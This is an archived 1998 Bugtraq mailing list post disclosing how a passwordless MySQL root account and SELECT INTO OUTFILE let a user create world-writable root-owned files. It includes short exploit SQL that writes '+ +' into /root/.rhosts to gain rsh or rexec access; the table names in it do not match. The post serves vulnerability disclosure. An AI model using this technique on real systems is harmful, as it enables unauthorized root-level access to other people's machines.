Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

MySQL Security

From: mike () COM PCNET RO (Sandu Mihai)
Date: Sun, 29 Mar 1998 11:16:22 +0300

When you use a certain mysql configuration it is possible to create
files on the system as root with rw-rw-rw.
Many MySQL users have included user root from localhost without password
in their config.
So. If on such a system you issue :
mysql -u root test
you not only will have access to the database but you'll be able to
create a file on the system with the root
ownership and rw-rw-rw useing the SELECT .. INTO OUTFILE  statement.
 The file you wish to create must NOT EXIST. Otherwise  mysql will give
you a "file already exists" error.
 To be more precise. MySQL will create the file specified as OUTFILE
with rw-rw-rw and with the current
user as owner.
 The exploit is as follows:
          mysql -u root test
        CREATE TABLE ll ( a CHAR(10) );
        INSERT INTO aa (a) VALUES ("+ +");
        SELECT * FROM aa INTO OUTFILE "/root/.rhosts";
The above exploit works for sites with rexec,rsh enabled (ssh is too
smart and won't let you in
if you have .rhosts 666, the same for authorized_keys)
 Well . I've tryied to be tricky by setting umask to 077 in the hope
that I can trick MySQL in
makeing the file 600 , childish try, I know but... who knows ?
 If someone could fool MySQL into makeing the file 600 then this is
quite a serious threat..

All my best,
                Sandu Mihai

p.s. The above works for Mysql Ver 6.5 Distrib 3.20.29 as reported by
mysql -V  Have phun.. :)
Previous By Date Next
Previous By Thread Next

Current thread: